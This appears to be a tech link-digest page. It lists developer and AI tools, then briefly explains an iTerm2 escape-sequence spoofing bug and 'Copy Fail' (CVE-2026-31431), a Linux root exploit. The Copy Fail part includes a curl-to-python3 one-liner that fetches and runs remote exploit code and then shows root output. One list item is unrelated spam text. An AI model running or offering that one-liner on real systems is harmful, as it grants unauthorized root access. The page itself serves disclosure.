則言
Thursday, April 30, 2026
Articles
- gstack: Use Garry Tan’s exact Claude Code setup: 23 opinionated tools that serve as CEO, Designer, Eng Manager, Release Manager, Doc Engineer, and QA
- Waza: Engineering habits you already know, turned into skills Claude can run.
- docmd: Build production-ready documentation from Markdown in seconds.
- talk-normal: Make any LLM talk like a normal person. A system prompt that removes AI slop.
- The Quiet Colossus
- smolvm: Tool to build & run portable, lightweight, self-contained virtual machines.
- MAD Bugs: “cat readme.txt” is not safe in iTerm2
- https://aistupidlevel.info/
- https://markdown.new/
- caveman: Claude Code skill that cuts 65% of tokens by talking like caveman
- trellis-mac: This is a port of Microsoft’s TRELLIS.2 — a state-of-the-art image-to-3D model — from CUDA-only to Apple Silicon via PyTorch MPS. No NVIDIA GPU required.
- ggsql: A grammar of graphics for SQL
- https://lawsofsoftwareengineering.com/
- VidStudio: a browser based video editor that doesn’t upload your files
- cal.diy: Scheduling infrastructure for absolutely everyone.
- RustTraining
- opendoas: A portable fork of the OpenBSD
doascommand, is a minimal replacement for the venerablesudo. - compressO: Convert any video/image into a tiny size. 100% free & open-source. Available for Mac, Windows & Linux.
- kami: Part of a trilogy: Kaku (書く) writes code, Waza (技) drills habits, Kami (紙) delivers documents.
- design-md-chrome: Chrome extension to extract styles from any website and generate DESIGN.md files and design skills for AI based on TypeUI
- 佐enter 成人碎牛皮手套
- localsend: An open-source cross-platform alternative to AirDrop
- GTFOBins is a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems.
- Warp is an agentic development environment, born out of the terminal.
- Just the Browser: Remove AI features, telemetry data reporting, sponsored content, product integrations, and other annoyances from web browsers.
- Copy Fail: CVE-2026-31431
MAD Bugs: “cat readme.txt” is not safe in iTerm2
The core bug
The bug is a trust failure. iTerm2 accepts the SSH conductor protocol from terminal output that is not actually coming from a trusted, real conductor session. In other words, untrusted terminal output can impersonate the remote conductor.
That means a malicious file, server response, banner, or MOTD can print:
- a forged DCS 2000p hook
- forged OSC 135 replies
and iTerm2 will start acting like it is in the middle of a real SSH integration exchange. That is the exploit primitive.
What the exploit is really doing
cat readme.txt
Once the hook is accepted, iTerm2 starts its normal conductor workflow. In upstream source, Conductor.start() immediately sends getshell(), and after that succeeds it sends pythonversion().
So the exploit does not need to inject those requests. iTerm2 issues them itself, and the malicious output only has to impersonate the replies.
Copy Fail
Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).
Targets /usr/bin/su by default; pass another setuid binary as argv[1].
Github: https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
Quick run:
curl https://copy.fail/exp | python3 && su
id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431